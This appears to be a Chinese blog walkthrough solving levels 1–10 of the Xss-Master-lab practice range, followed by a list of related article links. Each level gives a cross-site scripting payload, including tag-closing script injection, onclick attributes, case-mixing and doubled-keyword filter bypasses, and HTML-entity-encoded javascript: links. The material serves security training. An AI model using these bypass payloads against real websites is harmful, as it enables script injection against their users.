Xss-Master-lab靶场通关(1-10)

1,环境准备

2,登录xss-master-lab靶场

第一关,分析为xss反射型get请求;

可以在url中添加xss语句

第二关,发现value标签中有写的数据

构造闭合标签,把input标签闭合掉,然后写个script标签

'"><script>alert(123)</script>

第三关,发现有转义<>"符号的能力

所以使用单引号xss语句

第四关,通过源代码发现<>括号会转义,所以使用没有<>的语句

" οnclick="alert('xss')

第五关,发现对on事件做了过滤,将o使用了大写

可以使用闭合标签,在使用超链接

"><a href="javascript:alert('xss');">xss</a>

第六关,发现<>会进行转义,这里主要考验我们的大小写绕过

" ONcliCk="alert('xss')

第七关,第七关发现有on绕过,还有过滤on

可以使用" OONNcliCk="alert(123)

第八关,发现大小写绕过,标签闭合,xss字段做了处理,这时候可以使用编码绕过

将javascript:alert('xss')转换为ascii编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;

第九关,发现超链接进行了校验,可以利用ascii编码进行编码

javascript:alert("xss")// 进行编码,编码好以后,添加一个网页链接

第十关,所以针对name属性为t_sort的input标签进行注入,可以闭合属性,构造新的属性,同时把type="hidden"属性替换掉,要不然看不到页面效果,payload如下

t_sort='" type='text' οnclick='alert(123)'

相关推荐
Liquidliang6 分钟前
用Claude Code构建AI创意工作流:连接nano banana与veo3
前端·aigc
半花6 分钟前
【Vue】defineProps直接和withDefaults设置默认值区别
前端·vue.js
游九尘7 分钟前
服务器都是用的iis, 前端部署后报跨域,不是用同一个服务器 是前端项目的服务器做Nginx转发,还是后端项目的服务器做Nginx转发?
服务器·前端·nginx
携欢10 分钟前
PortSwigger靶场之DOM XSS in jQuery selector sink using a hashchange event通关秘籍
前端·jquery·xss
在安全厂商修设备13 分钟前
XSS 跨站脚本攻击剖析与防御 - 第一章:XSS 初探
web安全·网络安全·xss
Apifox22 分钟前
如何让 Apifox 发布的在线文档具备更好的调试体验?
前端·后端·测试
咔咔一顿操作26 分钟前
【CSS 3D 交互】打造沉浸式 3D 照片墙:结合 JS 实现拖拽交互
前端·javascript·css·3d·交互·css3
0x00028 分钟前
Uniapp - 自定义 Tabbar 实现
前端·uni-app
用户4582031531730 分钟前
Flexbox布局上手:10分钟告别垂直居中难题
前端·css
牛蛙点点申请出战31 分钟前
仿微信语音 WaveView 实现
android·前端·ios